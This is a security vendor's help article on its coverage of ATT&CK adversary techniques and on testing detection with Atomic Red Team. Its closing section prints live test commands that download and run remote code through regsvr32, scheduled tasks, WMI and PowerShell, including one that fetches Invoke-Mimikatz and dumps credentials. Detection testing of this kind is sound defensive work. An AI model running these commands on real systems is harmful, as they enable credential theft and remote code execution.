Building a great security operations program depends on layering the right detection techniques and security products to cover the appropriate number of adversary techniques for your business. This has historically been very difficult because most security products take a black box approach that does not transparently explain what techniques are covered.
We strive to make Red Canary’s coverage of adversary techniques both transparent and understandable so you can ensure your program is investing in the right security solutions.
Understanding coverage for an adversary technique
You can view an adversary technique in your Red Canary portal, along with detection analytics we used to identify that technique, how often it is used across all systems we monitor, and how prevalent it is in your environment.
To view Red Canary’s detection coverage for an adversary technique:
- Click Analytics & Intelligence in the site navigation.
- Click the Attack Techniques tab to see a matrix of all adversary techniques.
- Click on the name of any adversary technique.
- Review the Red Canary Coverage section to see a list of the active detection analytics that Red Canary uses to identify behavior associated with this technique. You can click any analytic name to read more about it.
Coverage differences between EDR/EPP platforms
No two EDR/EPP products collect exactly the same amount of telemetry under the same conditions. Some are designed to collect mostly unfiltered activity with little targeting or filtering performed on the endpoint. Others take an “opt in” approach and collect significantly less data. Features that negatively impact the amount of data collected by your sensor include:
- Deduplication, wherein a sensor decides not to record endpoint activity because it has reported the same / similar event in a recent time window (ranging from minutes to days).
- Capping/Limiting, wherein a sensor is configured to record a maximum number of records (oftentimes per process path, binary, etc.) per time window (ranging from minutes to days).
- Targeting, wherein a sensor collects information only under certain conditions or circumstances, such as:
- Recording registry modifications only for registry keys/paths
- Recording file modifications only for specific non-system paths
- Recording binary information for only non-Microsoft signed binaries
These differences in telemetry collection make it impossible for us to concretely tell you that your specific EDR/EPP platform collects the data needed to enable a specific detection analytic.
We continually strongly advise EDR/EPP vendors to increase their telemetry collection. We also ensure they meet our quality standards through a thorough telemetry collection validation process we run for each product. Products must collect a certain amount of telemetry before we will consider supporting them (this is why we only support a small number of EDR/EPP platforms on the market; most do not pass this step).
Techniques Red Canary does not cover
There are adversary techniques that Red Canary does not have coverage for. This lack of coverage can be for a number of reasons:
- EDR products do not provide the data required to observe this technique (for example, Supply Chain Compromise (T1195)).
- Some techniques are overly broad and more appropriate for visibility use cases than detection use cases (for example, the File Deletion (T1107) technique is not specific and thus is not well suited for detection purposes).
- Red Canary has not prioritized the detection of this technique. This rarely, if ever, happens, generally in circumstances when a new technique is added to ATT&CK that has not been seen in the wild and detection approaches are being researched.
Learning more about Red Canary coverage
Red Canary’s detection engineering and intelligence teams always welcome conversations about detection coverage. If you have questions about our coverage for a specific technique, for classes of techniques, or simply want to chat more about this topic, please don’t hesitate to reach out and we’ll set up a call between our teams.
Testing an adversary technique
You can test an adversary technique to assess Red Canary detection coverage, your automation playbooks, and your team’s response to those confirmed threats.
You can test an adversary technique in a number of ways, using paid or open source tools, simple command executions, etc. For teams looking to start testing quickly and easily, Atomic Red Team is an open source library of simple tests that any security team can execute to test their defenses. Tests are focused, have few dependencies, and are defined in a structured format that can be used by automation frameworks.
To simulate an adversary technique and test Red Canary’s detection coverage using Atomic Red Team:
- Read the Atomic Red Team getting started guide.
- Select a test.
- Execute that test.
- Review the events identified and investigated by Red Canary and any confirmed threats that result.
Selecting tests to exercise
Testing begins with selecting the right adversary techniques to simulate. It is important that you execute actions like an adversary would (a common mistake is to run a single command, like listing local user accounts, without the follow-on commands that an adversary would take).
Following are several examples our customers have used during recent tests:
Good tests for Windows endpoints
ATT&CK Technique T1053 - Scheduled Task (Privilege Escalation, Execution, and Persistence)
Running the below command will test the listed techniques above. Scheduled tasks will use regsvr32.exe to pull a (safe) file down from the Atomic Red Team repository and execute it.
SCHTASKS /Create /SC ONCE /TN "Atomic Testing" /TR "regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/8e969def85345af3d509210555318e9b73729d7f/atomics/T1117/src/RegSvr32.sct scrobj.dll" /mo 30
ATT&CK Technique T1003 - Credential Dumping (Credential Access)
Running the below command will use PowerShell to download Mimikatz from the Empire repository and execute it.
powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/dev/data/module_source/credentials/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds"
ATT&CK Technique T1047 - Lateral Movement, Execution, and Discovery
Run the below command from a test machine and replace REMOTECOMPUTERNAME with a hostname or IP of another remote system that you’d like to test. The command below will take advantage of a WMI to spawn PowerShell on the remote computer, pull down a benign discovery script from our Atomic Red Team GitHub, and execute it. This will simulate lateral movement and reconnaissance.
wmic /node:REMOTECOMPUTERNAME process call create “powershell.exe IEX (New-Object Net.WebClient).DownloadString(‘https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Misc/Discovery.bat’) > $env:temp\output.txt”
ATT&CK Technique T1117 - Regsvr32.exe (Execution)
Running the below command utilizes regsvr32.exe to download a (safe) file from the Atomic Red Team repository. The file is also executed spawning calc.exe.
regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/8e969def85345af3d509210555318e9b73729d7f/atomics/T1117/src/RegSvr32.sct scrobj.dll
ATT&CK Technique T1086 - Powershell (Execution, Discovery)
Running the below command downloads a discovery batch file and executes it. The discovery file utilizes safe native Windows commands to pull system information and output the data to a text file.
powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Misc/Discovery.bat')" > output.txt
Good tests for Linux endpoints
Rocke & Roll
This chain reaction executes multiple commands that simulate the behaviors of a multi-stage “Rocke & Roll” attack. This includes the use of the following techniques:
- T1027 - Obfuscated Files or Information
- T1222 - File Permission Modification
- T1107 - File Deletion
- T1057 - Process Discovery
- T1049 - System Network Connections Discovery
- T1036 - Masquerading
- T1168 - Local Job Scheduling
- T1099 - Timestomp
Download and execute the following script: rocke-and-roll-stage-01.sh